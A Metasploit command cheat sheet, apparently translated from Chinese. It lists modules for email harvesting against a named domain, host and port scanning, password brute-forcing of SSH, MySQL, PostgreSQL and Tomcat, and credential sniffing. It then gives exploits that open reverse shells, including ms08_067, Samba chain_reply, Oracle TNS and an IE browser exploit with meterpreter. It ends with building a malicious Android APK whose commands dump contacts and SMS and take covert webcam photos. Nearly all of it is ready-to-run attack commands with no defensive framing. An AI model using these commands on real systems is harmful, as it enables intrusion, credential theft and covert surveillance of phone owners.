Commonly used Metasploit modules

msf information-gathering modules

Search for e-mail addresses associated with a website
search_email_collector
use auxiliary/gather/search_email_collector
set DOMAIN cracer.com
run

Host discovery modules
Discover live hosts on a network segment
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.80.0/24
set THREADS 50
run

Port scanning
search portscan
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.80.1
set THREADS 20
run

Service scanning
search name:_version

telnet service scanning
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.80.0/24
set THREADS 100
run

ssh service scanning
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.80.0/24
set THREADS 100
run

oracle database service scanning
use auxiliary/scanner/oracle/tnslsnr_version
set RHOSTS 192.168.80.0/24
set THREADS 100
run

Password guessing and sniffing

ssh service password guessing
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.80.134
set USERNAME root
set PASS_FILE /root/pass.txt
set THREADS 50
run

Password sniffing
use auxiliary/sniffer/psnuffle
run

Exploitation

mysql attack

search mysql
use auxiliary/scanner/mysql/mysql_login
show options
set RHOSTS 192.168.80.130
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

postgresql attack

search postgresql
use auxiliary/scanner/postgres/postgres_login
show options
set RHOSTS 192.168.80.130
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

tomcat attack
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.1.1
set PASS_FILE /root/pass.txt
set USER_FILE /root/user.txt
exploit

telnet attack
use auxiliary/scanner/telnet/telnet_version
set RHOSTS 192.168.1.1
exploit

samba attack

use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.1.1 192.168.1.0/24
set THREADS 200
exploit

search ms08_067
use exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
show options
show targets
set RHOST 192.168.80.130
set LPORT 5555
set LHOST 192.168.80.131
set target 7
exploit

SAMBA penetration attack

search chain_reply
use exploit/linux/samba/chain_reply
show targets
set target 0
set RHOST 192.168.80.1
set RPORT 139
set LHOST 192.168.80.130
set LPORT 5544
exploit

Oracle penetration attack
use exploit/windows/oracle/tns_auth_sesskey
show options
set RHOST 192.168.80.133
set RPORT 1521
set LHOST 192.168.80.130
set LPORT 4444
set target 1
exploit

Browser penetration attack example
ms11-050
use windows/browser/ms11_050_mshtml_cobjectelement
info
set payload windows/meterpreter/reverse_http
set URIPATH ms11050
set LHOST 192.168.80.131
set LPORT 8888
exploit

Compromising an Android phone

msfpayload android/meterpreter/reverse_tcp LHOST=172.16.1.109 LPORT=4444 R > /root/Desktop/apk.apk
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 172.16.1.109
exploit
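dump_contacts: exports the contacts
dump_sms: exports the SMS messages
webcam_list shows how many cameras there are
-i 1 selects the rear camera
webcam_snap takes a photo (I could see my computer)
webcam_stream turns on the camera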